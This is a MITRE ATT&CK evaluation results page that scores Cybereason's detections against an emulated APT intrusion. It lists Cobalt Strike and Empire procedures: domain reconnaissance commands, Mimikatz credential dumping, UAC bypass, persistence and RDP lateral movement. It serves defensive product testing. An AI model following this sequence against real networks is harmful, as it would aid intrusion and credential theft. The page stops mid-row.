Home  >  Results  >  Cybereason  >  Overview
Cybereason
Tags:    

Cybereason Overview Tactic Page Information

The ATT&CK tactic page displays all tested techniques belonging to that tactic, as well as all procedures and their respective detections. The procedures are grouped by their technique. The Procedure column contains a description of how the technique was tested. The Step column is where in the operational flow the procedure occurred. Click the Step Number to view it in the Operational Flow panel. Detections are classified by one or more Detection Types, summarized by the Detection Notes, and may be supported by Screenshots. The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

MITRE does not assign scores, rankings, or ratings. The evaluation results are available to the public, so other organizations may provide their own analysis and interpretation - these are not endorsed or validated by MITRE.

Vendor Configuration     JSON     Legend
Legend
Main Detection Categories: Detection Modifiers:

None

Telemetry

Indicator of Compromise

General Behavior

Specific Behavior

Enrichment

Tainted

Delayed

Configuration Change
Step
Procedures
Technique
Detection Type Detection Notes
Screenshots
1.A.1
Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)
User Execution
(T1204)
General Behavior
  
A General Behavior alert was generated based on the identification of Resume Viewer.exe as unknown malware by the Anti-Malware engine. Vendor stated that the capability would have prevented the execution of Resume Viewer.exe.
General Behavior
  
A General Behavior alert was generated based on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious.
Telemetry (Tainted)
  
 
Telemetry showed that Resume Viewer.exe was executed and running as a process. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. The provided screenshot was captured later in the evaluation and includes additional information appended to explorer.exe not relevant to this procedure.
General Behavior alert identifying Resume Viewer.exe as unknown malware
General Behavior alert for explorer.exe executing Resume Viewer.exe, identified as a known malicious file
Telemetry showing Resume Viewer.exe running as a process (tainted by parent alert on explorer.exe)
Rundll32
(T1085)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for rundll32.exe launching a module in a temporary folder and injecting shell code into a victim process. The alert was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious.
Telemetry (Tainted)
  
 
Telemetry within the rundll32.exe injection alert also showed full command-line arguments of rundll32.exe executing update.dat. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. For most alerts in the user interface, the telemetry behind it is separately available in the capability and counted as a separate detection.
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for injected shellcode by a compromised legitimate process (rundll32.exe). The alert was tagged with the correct ATT&CK Tactic (Defense Evasion) and a related Technique (Process Injection) and was tainted by parent alert on rundll32.exe injection.
Specific Behavior alert for rundll32.exe launching a module from a temporary folder and injecting shellcode into a victim process (tainted by parent alert on explorer.exe)
Telemetry within the rundll32.exe injection alert showing command-line arguments of rundll32.exe running update.dat (tainted by parent alert on explorer.exe)
Specific Behavior alert for rundll32.exe, identified as a compromised legitimate process, injecting shellcode into rundll32.exe, tagged with the correct ATT&CK Tactic (Defense Evasion) and a related Technique (Process Injection)
Scripting
(T1064)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe launching pdfhelper.cmd. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious.
Telemetry showing cmd.exe launching pdfhelper.cmd (tainted by parent alert on explorer.exe)
1.B.1
Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder
Registry Run Keys / Startup Folder
(T1060)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe rewriting autoupdate.bat to the user Debbie's Startup folder. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious.
Telemetry showing rename file event for autoupdate.bat
Process tree showing the cmd.exe associated with the autoupdate.bat file event (tainted by parent alert on explorer.exe)
1.C.1
Cobalt Strike: C2 channel established
Commonly Used Port
(T1043)
Telemetry
  
Telemetry showed port 53 command and control traffic.
Telemetry showing port 53 command and control traffic
Data Encoding
(T1132)
Telemetry (Tainted)
  
 
Telemetry showed base64-encoded DNS requests for freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent Injected Shellcode alert.
Telemetry showing rundll32.exe making encoded DNS queries to freegoogleadsenseinfo.com (C2 Domain) (tainted by parent Injected Shellcode alert)
Process tree showing rundll32.exe making encoded DNS queries to freegoogleadsenseinfo.com (C2 Domain) (tainted by parent Injected Shellcode alert)
Standard Application Layer Protocol
(T1071)
Telemetry (Tainted)
  
 
Telemetry showed rundll32.exe making DNS queries to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent Injected Shellcode alert.
Telemetry showing rundll32.exe making DNS queries to freegoogleadsenseinfo.com (C2 Domain) (tainted by parent Injected Shellcode alert)
Process tree showing rundll32.exe making DNS queries to freegoogleadsenseinfo.com (C2 Domain) (tainted by parent Injected Shellcode alert)
2.A.1
Cobalt Strike: 'ipconfig /all' via cmd
System Network Configuration Discovery
(T1016)
Enrichment (Tainted)
  
 
The capability enriched cmd.exe executing ipconfig.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery). The data was tainted by a parent Injected Shellcode alert.
Telemetry
  
Telemetry showed cmd.exe executing ipconfig with command-line arguments.
Enrichment of ipconfig.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery) (tainted by a parent Injected Shellcode alert)
Telemetry showing cmd.exe executing ipconfig with command-line arguments
2.A.2
Cobalt Strike: 'arp -a' via cmd
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed arp.exe executing with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert.
Telemetry showing cmd.exe executing arp with command-line arguments
Telemetry showing cmd.exe executing arp with command-line arguments
Telemetry showing arp.exe executing within the process tree (tainted by a parent Injected Shellcode alert)
2.B.1
Cobalt Strike: 'echo' via cmd to enumerate specific environment variables
System Owner / User Discovery
(T1033)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing echo with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert.
Telemetry showing cmd.exe executing echo with command-line arguments (tainted by a parent Injected Shellcode alert)
2.C.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
  
No detection capability demonstrated for this procedure.
2.C.2
Cobalt Strike: 'tasklist /v' via cmd
Process Discovery
(T1057)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing tasklist with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert.
Telemetry showing cmd.exe executing tasklist with command-line arguments
Telemetry showing tasklist.exe executing within the process tree (tainted by a parent Injected Shellcode alert)
2.D.1
Cobalt Strike: 'sc query' via cmd
System Service Discovery
(T1007)
Enrichment (Tainted)
  
 
The capability enriched cmd.exe executing sc.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery). The data was tainted by a parent Injected Shellcode alert.
Telemetry
  
Telemetry showed cmd.exe executing sc with command-line arguments.
Enrichment of sc.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery) (tainted by a parent Injected Shellcode alert)
Telemetry showing cmd.exe executing sc with command-line arguments
2.D.2
Cobalt Strike: 'net start' via cmd
System Service Discovery
(T1007)
Enrichment (Tainted)
  
 
The capability enriched cmd.exe executing net.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery). The data was tainted by a parent Injected Shellcode alert.
Telemetry
  
Telemetry showed cmd.exe executing net with command-line arguments. 
Enrichment of net.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery) (tainted by a parent Injected Shellcode alert)
Telemetry showing cmd.exe executing net with command-line arguments
2.E.1
Cobalt Strike: 'systeminfo' via cmd
System Information Discovery
(T1082)
Enrichment (Tainted)
  
 
The capability enriched systeminfo.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (System Information Discovery). The data was tainted by a parent Injected Shellcode alert.
Telemetry
  
Telemetry showed cmd.exe executing systeminfo with command-line arguments.
Enrichment of systeminfo.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (System Information Discovery) (tainted by a parent Injected Shellcode alert)
Telemetry showing cmd.exe executing systeminfo
2.E.2
Cobalt Strike: 'net config workstation' via cmd
System Information Discovery
(T1082)
Telemetry
  
Telemetry showed cmd.exe executing net with command-line arguments.
Enrichment (Tainted)
  
 
The capability enriched net.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (System Information Discovery). The data was tainted by a parent Injected Shellcode alert.
Telemetry showing cmd.exe executing net executing with command-line arguments
Enrichment of net.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (System Information Discovery) (tainted by a parent Injected Shellcode alert)
2.F.1
Cobalt Strike: 'net localgroup administrators' via cmd
Permission Groups Discovery
(T1069)
Telemetry
  
Telemetry showed cmd.exe executing net with command-line arguments.
Enrichment (Tainted)
  
 
The capability enriched net.exe executing with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery). The data was tainted by a parent Injected Shellcode alert.
Telemetry showing cmd.exe executing net with command-line arguments
Enrichment of net.exe executing with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery)
Process tree showing enriched net.exe executing (tainted by a parent Injected Shellcode alert)
2.F.2
Cobalt Strike: 'net localgroup administrators /domain' via cmd
Permission Groups Discovery
(T1069)
Telemetry
  
Telemetry showed cmd.exe executing net with command-line arguments.
Enrichment (Tainted)
  
 
The capability enriched net.exe executing with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery). The data was tainted by a parent Injected Shellcode alert.
Telemetry showing cmd.exe executing net with command-line arguments
Enrichment of net.exe executing with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery)
Process tree showing enriched net.exe executing (tainted by a parent Injected Shellcode alert)
2.F.3
Cobalt Strike: 'net group "Domain Admins" /domain' via cmd
Permission Groups Discovery
(T1069)
Telemetry
  
Telemetry showed cmd.exe executing net with command-line arguments.
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery). The alert was tainted by a parent Injected Shellcode alert.
Telemetry showing cmd.exe executing net with command-line arguments
General Behavior alert for net.exe executing with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery)
Process tree showing alerted net.exe executing (tainted by a parent Injected Shellcode alert)
2.G.1
Cobalt Strike: 'net user /domain' via cmd
Account Discovery
(T1087)
Telemetry
  
Telemetry showed cmd.exe executing net with command-line arguments.
Enrichment (Tainted)
  
 
The capability enriched net.exe executing with the correct ATT&CK Technique (Account Discovery). The data was tainted by a parent Injected Shellcode alert
Telemetry showing net executing with command-line arguments
Enrichment of net.exe executing with the correct ATT&CK Tactic (Account Discovery) and Technique (Discovery)
Process tree showing enriched net.exe executing with the correct ATT&CK Technique (Account Discovery) (tainted by a parent Injected Shellcode alert)
2.G.2
Cobalt Strike: 'net user george /domain' via cmd
Account Discovery
(T1087)
Telemetry
  
Telemetry showed cmd.exe executing net with command-line arguments.
Enrichment (Tainted)
  
 
The capability enriched net.exe executing with the correct ATT&CK Technique (Account Discovery). The data was tainted by a parent Injected Shellcode alert
Telemetry showing net executing with command-line arguments
Enrichment of net.exe executing with the correct ATT&CK Tactic (Account Discovery) and Technique (Discovery)
Process tree showing enriched net.exe executing with the correct ATT&CK Technique (Account Discovery) (tainted by a parent Injected Shellcode alert)
2.H.1
Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert.
Telemetry within a process tree showing reg.exe executing with command-line arguments (tainted by a parent Injected Shellcode alert)
Telemetry showing cmd.exe executing reg with command-line arguments
3.A.1
Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level
Access Token Manipulation
(T1134)
None
  
No detection capability demonstrated for this procedure, though an alert was generated for malicious code injection into PowerShell. Telemetry also showed that bypassuactoken.x64.dll was loaded.
Alert for malicious code injection into PowerShell (does not count as a detection)
Telemetry showing the bypassuactoken.x64.dll was loaded (does not count as a detection)
Bypass User Account Control
(T1088)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe running as medium integrity as user Debbie then another instance running later as high integrity as user Debbie. The telemetry is tainted by a parent PowerShell alert.
Telemetry showing powershell.exe running as medium integrity as user Debbie
Telemetry showing powershell.exe running as high integrity as user Debbie (tainted by a parent PowerShell alert)
3.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
  
No detection capability demonstrated for this procedure.
3.C.1
Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe
Process Injection
(T1055)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for process injection from powershell.exe into cmd.exe (Anonymous RWX). The alert is tagged with the correct ATT&CK Tactic (Defense Evasion) and Technique (Process Injection). The alert is tainted by a parent PowerShell alert.
Specific Behavior alert for powershell.exe injecting into cmd.exe
Specific Behavior alert for PowerShell injection into cmd.exe mapped to ATT&CK Tactic (Defense Evasion) and Technique (Process Injection) (tainted by a parent PowerShell alert)
4.A.1
Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd
Remote System Discovery
(T1018)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe executing as part of a suspicious execution chain related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was tainted by a parent Injected Shellcode alert.
Telemetry
  
Telemetry showed cmd.exe executing net with command-line arguments.
General Behavior alert for net.exe executing as part of a suspicious execution chain
Process tree showing alerted net.exe executing (tainted by a parent Injected Shellcode alert)
Telemetry showing net.exe executing with command-line arguments
4.A.2
Cobalt Strike: 'net group "Domain Computers" /domain' via cmd
Remote System Discovery
(T1018)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe executing as part of a suspicious execution chain related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Remote System Discovery). The alert was tainted by a parent Injected Shellcode alert.
Telemetry
  
Telemetry showed cmd.exe executing net with command-line arguments.
General Behavior alert for net.exe executing as part of a suspicious execution chain
Process tree showing alerted net.exe executing (tainted by a parent Injected Shellcode alert)
Telemetry showing net.exe executing with command-line arguments
4.B.1
Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd
System Network Configuration Discovery
(T1016)
Enrichment (Tainted)
  
 
The capability enriched netsh.exe executing with the correct ATT&CK Tactic (Discovery) and a related Technique (Security Software Discovery). The data was tainted by a parent Injected Shellcode alert.
Telemetry
  
Telemetry showed cmd.exe executing net with command-line arguments. command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of netsh.exe executing with correct ATT&CK Tactic (Discovery) and related Technique (Security Software Discovery) (tainted by a parent Injected Shellcode alert)
4.C.1
Cobalt Strike: 'netstat -ano' via cmd
System Network Connections Discovery
(T1049)
Enrichment (Tainted)
  
 
The capability enriched netstat.exe executing as Reconnaissance and mapped to the correct ATT&CK Technique (System Network Connections Discovery). The data was tainted by a parent Injected Shellcode alert.
Telemetry
  
Telemetry showed cmd.exe executing netstat with command-line arguments.
Enrichment of netstat.exe executing labeled as Reconnaissance and mapped to the correct ATT&CK Technique (System Network Connections Discovery) (tainted by a parent Injected Shellcode alert)
Telemetry showing cmd.exe executing netstat with command-line arguments
5.A.1
Cobalt Strike: Built-in Mimikatz credential dump capability executed
Credential Dumping
(T1003)
Specific Behavior
  
A Specific Behavior alert was generated for svchost.exe loading Mimikatz and accessing lsass (an audited system resource). The alert was also tagged with the correct ATT&CK Tactic (Credential Access) and related Technique (Process Injection).
Specific Behavior alert with correct ATT&CK Tactic (Credential Access) and related Technique (Process Injection) with details about svchost.exe accessing lsass
Process Injection
(T1055)
Specific Behavior
  
A Specific Behavior alert was generated for svchost.exe reflectively loading a malicious executable, identified as Mimikatz, then accessing lsass. The alert was also tagged with the correct ATT&CK Technique (Process Injection) and Tactics (Defense Evasion, Privilege Escalation). The powerkatz.dll was also seen loaded as a floating executable code.
Specific Behavior alert with correct ATT&CK Technique (Process Injection) and Tactics (Defense Evasion, Privilege Escalation)
Data within alert showing loaded powerkatz.dll as floating executable code
5.A.2
Cobalt Strike: Built-in hash dump capability executed
Credential Dumping
(T1003)
Telemetry (Tainted)
  
 
Telemetry showed svchost.exe injecting into lsass.exe. The telemetry was tainted by the parent “injected (svchost.exe > lsass.exe)” alert. The hashdumpx64.dll was also seen loaded as a floating executable code. 
Telemetry showing svchost.exe process injection into lsass.exe (tainted by a parent injection alert)
Parent alert for svchost.exe injecting into lsass.exe, labeled as Malicious Code Injection
Telemetry within alert showing loaded hashdumpx64.dll as floating executable code
Process Injection
(T1055)
Specific Behavior
  
A Specific Behavior alert was generated for svchost.exe injection into lsass.exe. The alert was mapped with the correct ATT&CK Tactic (Defense Evasion, Privilege Escalation) and Technique (Process Injection). The hashdumpx64.dll was also seen loaded as a floating executable code.
Specific Behavior alert for svchost.exe injecting into lsass.exe, labeled as Malicious Code Injection
Details of Specific Behavior alert for svchost.exe process injection into lsass.exe with correct ATT&CK Tactic (Defense Evasion, Privilege Escalation) and Technique (Process Injection)
Data within alert showing loaded hashdumpx64.dll as floating executable code
5.B.1
Cobalt Strike: Built-in token theft capability executed to change user context to George
Access Token Manipulation
(T1134)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe associated with both users Debbie and George, indicating user context change via token manipulation. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious.
Telemetry within the process tree showing cmd.exe associated with users Debbie and George (tainted by a parent alert on explorer.exe)
6.A.1
Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert.
Telemetry showing reg.exe executing with command-line arguments (tainted by a parent Injected Shellcode alert)
6.B.1
Cobalt Strike: C2 channel modified
Commonly Used Port
(T1043)
Enrichment (Tainted)
  
 
The capability enriched rundll32.exe opening a connection to the C2 server over a "HTTP port" with the correct ATT&CK Tactic (Command and Control) and the Technique (Commonly Used Port). The data was tainted by a parent Injected Shellcode alert.
Telemetry (Tainted)
  
 
Telemetry showed rundll32.exe opening a connection over port 80. The telemetry was tainted by a parent Injected Shellcode alert listed as the owner process.
Enrichment of rundll32.exe making a connection over the "HTTP Port" with the correct ATT&CK Tactic (Command and Control) and Technique (Commonly Used Port) (tainted by a parent Injected Shellcode alert)
Telemetry showing rundll32.exe opening a connection over port 80 (tainted by a parent Injected Shellcode alert, listed as Owner process)
Multiband Communication
(T1026)
Telemetry (Tainted)
  
 
Telemetry showed the same rundll32.exe opening a connection over port 80 while making DNS queries to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent Injected Shellcode alert listed as the owner process.
Telemetry showing the same rundll32.exe opening a connection over port 80 while making DNS queries to freegoogleadsenseinfo.com (C2 domain) (tainted by a parent Injected Shellcode alert, listed as Owner process)
Standard Application Layer Protocol
(T1071)
Enrichment (Tainted)
  
 
The capability enriched rundll32.exe opening an unusual network connection to the C2 server over the port 80 "HTTP port.” The data was tagged with the correct ATT&CK Tactic (Command and Control) and Technique (Standard Application Layer Protocol), and also showed the amount of transmitted/received bytes as well as that the winhttp.dll module was loaded (which an analyst could use to determine HTTP was used). The data was tainted by a parent Injected Shellcode alert.
Enrichment of rundll32.exe making an unusual network connection over the "HTTP Port" with the correct ATT&CK Tactic (Command and Control) and the Technique (Standard Application Layer Protocol) (tainted by a parent Injected Shellcode alert)
Enrichment of rundll32.exe showing connection over port 80 and the amount of transmitted/received bytes (tainted by a parent Injected Shellcode alert)
Enrichment of rundll32.exe showing winhttp.dll module loaded (tainted by a parent Injected Shellcode alert)
6.C.1
Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)
Remote Desktop Protocol
(T1076)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker) with Remote Interactive Logon Type. The telemetry was tainted by a parent Injected Shellcode alert listed as the owner process Telemetry also showed rdpclip.exe executing on 10.0.0.5 (Conficker).
Telemetry showing cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker) (tainted by a parent Injected Shellcode alert, listed as Owner process)
Telemetry showing cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker) with Remote Interactive Logon Type
Telemetry showing rdpclip.exe executing on 10.0.0.5 (Conficker)
7.A.1
Added user Jesse to Conficker (10.0.0.5) through RDP connection
Create Account
(T1136)
Telemetry
  
Telemetry showed lsass.exe creating a Registry key for user Jesse, indicating that the user is new.
Telemetry showing lsass.exe creating a Registry key for user Jesse
Graphical User Interface
(T1061)
Telemetry
  
Telemetry showed mmc.exe, the Microsoft Management Console, executing the GUI-based lusrmgr.msc (Local Users and Groups snap-in).
Telemetry showing lusrmgr.msc running from mmc.exe
Account Discovery
(T1087)
Telemetry
  
Telemetry showed mmc.exe, the Microsoft Management Console, executing the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information.
Telemetry showing lusrmgr.msc running from mmc.exe
7.B.1
Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed the creation of updater.dll. Telemetry was tainted by a parent alert on cmd.exe (listed as the owner process) generated based on updater.dll being detected as known malware.
Telemetry showing the file write of updater.dll (tainted by a parent alert on cmd.exe, listed as Owner Process)
Parent alert for updater.dll being detected as known malware
7.C.1
Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)
Scheduled Task
(T1053)
Enrichment
  
The capability enriched schtasks.exe creating the Resume Viewer Update Checker scheduled task as reboot persistence and as SYSTEM. The data was also mapped to the correct ATT&CK Tactic (Persistence).
Telemetry
  
Telemetry showed the Resume Viewer Update Checker scheduled task.
Enrichment of schtasks.exe with the correct ATT&CK Tactic (Persistence)
Telemetry showing the Resume Viewer Update Checker scheduled task
8.A.1
Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd
File and Directory Discovery
(T1083)
Enrichment (Tainted)
  
 
The capability enriched cmd.exe executing dir with command-line arguments with the correct ATT&CK Tactic (Discovery) and Technique (File and Directory Discovery). The data was tainted by a parent Injected Shellcode alert.
Telemetry
  
Telemetry showed cmd.exe executing dir with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of cmd.exe executing the dir with the correct ATT&CK Tactic (Discovery) and Technique (File and Directory Discovery) (tainted by a parent Injected Shellcode alert)
8.A.2
Cobalt Strike: 'tree "C:\Users\debbie"' via cmd
File and Directory Discovery
(T1083)
Enrichment (Tainted)
  
 
The capability enriched cmd.exe executing tree with command-line arguments with the correct ATT&CK Tactic (Discovery) and Technique (File and Directory Discovery). The data was tainted by a parent Injected Shellcode alert.
Telemetry
  
Telemetry showed cmd.exe executing tree with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of cmd.exe executing the tree with the correct ATT&CK Tactic (Discovery) and Technique (File and Directory Discovery) (tainted by a parent Injected Shellcode alert)
8.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
  
No detection capability demonstrated for this procedure.
8.C.1
Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie
Input Capture
(T1056)
None
  
No detection capability was available, though an alert was generated based on a chain of injections caused by process injection of powershell.exe to cmd.exe then explorer.exe. Data within the alert showed the loaded keyloggerx64.dll module, and additional data showed the memory address and size of the module within explorer.exe.
Alert for Chain of Injections for powershell.exe injecting into cmd.exe (does not count as detection)
Alert for Chain of Injections showing powershell.exe injecting into explorer.exe (does not count as detection)
Alert showing loaded keyloggerx64.dll module (does not count as detection)
Alert showing keyloggerx64.dll module loaded into explorer.exe, including memory address and size (does not count as a detection)
Application Window Discovery
(T1010)
None
  
No detection capability demonstrated for this procedure.
8.D.1
Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie
Screen Capture
(T1113)
None
  
No detection capability was available, though an alert was generated based on explorer.exe being flagged for loading a Meterpreter Agent. Data within a previous process injection alert showed the loaded screenshotx64.dll module.
Alert for explorer.exe loading a Meterpreter agent (does not count as detection)
Alert showing loaded screenshotx64.dll module (does not count as a detection)
Process Injection
(T1055)
Specific Behavior
  
A Specific Behavior alert was generated based on a malicious code injection caused by process injection of explorer.exe. The alert was mapped with the correct ATT&CK Tactics (Defense Evasion, Privilege Escalation) and Technique (Process Injection) and indicated that explorer.exe was hosting injected threads and loading malicious files.
Specific Behavior alert for process injection explorer.exe rolled into chain of injections
Specific Behavior alert for Malicious code injection to explorer.exe with correct ATT&CK Tactic (Defense Evasion, Privilege Escalation) and Technique (Process Injection)
9.A.1
Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
9.B.1
Cobalt Strike: Built-in download capability executed to a collect file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Data from Network Shared Drive
(T1039)
None
  
No detection capability demonstrated for this procedure, though telemetry showed connection between Nimda (10.0.1.6) and the source of the file, Conficker (10.0.0.5), over port 445.
Telemetry showing a port 445 connection between Nimda (10.0.1.6) and the source of the file on Conficker (10.0.0.5) (does not count as detection)
Exfiltration Over Command and Control Channel
(T1041)
None
  
No detection capability demonstrated for this procedure, though telemetry showed connection between Nimda (10.0.1.6) and the source of the file, Conficker (10.0.0.5), over port 445.
Telemetry showing a port 445 connection between Nimda (10.0.1.6) and the source of the file on Conficker (10.0.0.5) (does not count as detection)
10.A.1
Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32
Registry Run Keys / Startup Folder
(T1060)
Telemetry (Tainted)
  
 
Telemetry showed rundll32.exe executing autoupdate.bat from the Startup folder. The telemetry was tainted by a parent Injected Shellcode alert.
Telemetry showing rundll32.exe executing autoupdate.bat from the Startup folder (tainted by a parent Injected Shellcode alert)
Parent alert for Injected shellcode into rundll32.exe
10.A.2
Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
Scheduled Task
(T1053)
Telemetry (Tainted)
  
 
Telemetry showed rundll32.exe executing update.dat with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert.
Telemetry showing rundll32.exe executing update.dat (tainted by a parent Injected Shellcode alert)
Parent alert for Injected shellcode into rundll32.exe
10.B.1
RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
Remote Desktop Protocol
(T1076)
Telemetry (Tainted)
  
 
Telemetry showed the logon session for Jesse to Conficker (10.0.0.5) as a Remote Interactive Logon Type. Telemetry also showed a connection over port 3389 to Conficker (10.0.0.5) through rundll32.exe serving as a proxy. The telemetry was tainted by a parent Injected Shellcode alert.
Telemetry of logon session for Jesse from Nimda (10.0.1.6) to Conficker (10.0.0.5) with Remote Interactive Logon Type
Telemetry showing a TCP port 3389 connection to Conficker (10.0.0.5)
Telemetry showing rundll32.exe process used to proxy connection over port 3389 from Nimda (10.0.1.6) to Conficker (10.0.0.5) (tainted by a parent Injected Shellcode alert)
Valid Accounts
(T1078)
Telemetry
  
Telemetry showed the logon session for Jesse to Conficker (10.0.0.5) as a Remote Interactive Logon Type.
Telemetry of logon session for Jesse from Nimda (10.0.1.6) to Conficker (10.0.0.5) with Remote Interactive Logon Type
11.A.1
Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)
Scripting
(T1064)
Specific Behavior
  
A Specific Behavior alert was generated for powershell.exe, labeled with Command and Control as well as Malicious use of PowerShell. The alert was tagged as a Obfuscated PowerShell payload and mapped to the correct ATT&CK Tactic (Execution) and Technique (PowerShell)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe execution, including decoded full command-line arguments, as well as wscript.exe executing autoupdate.vbs. The telemetry was tainted by a parent PowerShell alert.
Specific Behavior alert for powershell.exe, labeled with Command and Control and Malicious use of PowerShell
Specific Behavior alert tagged as obfuscated PowerShell payload and downloader mapped to the correct ATT&CK Tactic (Execution) and Technique (PowerShell)
Telemetry showing decoded PowerShell command with command-line arguments (tainted by a parent PowerShell alert)
Telemetry showing wscript.exe executing autoupdate.vbs (tainted by a parent PowerShell alert)
11.B.1
Empire: C2 channel established
Commonly Used Port
(T1043)
Enrichment (Tainted)
  
 
The capability enriched powershell.exe as making a connection over a ”HTTP Port”. The data was tagged with the correct ATT&CK Technique (Commonly Used Port) and Tactic (Command and Control) and was tainted by a parent PowerShell alert.
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe making an outgoing connection on TCP port 443 to 192.168.0.5 (C2 Server). Telemetry also showed decoded command-line arguments to perform a HTTPS connection to freegoogleadsenseinfo.com (C2 domain) over port 443. The telemetry was tainted by a parent PowerShell alert.
Enrichment of powershell.exe making a connection over a ”HTTP Port," tagged with the correct ATT&CK Technique (Commonly Used Port) and Tactic (Command and Control) (tainted by a parent PowerShell alert)
Telemetry showing powershell.exe making outgoing connection to 192.168.0.5 (C2 Server) over port TCP port 443 (tainted by a parent PowerShell alert)
Telemetry showing decoded PowerShell command with command-line arguments (tainted by a parent PowerShell alert)
Standard Application Layer Protocol
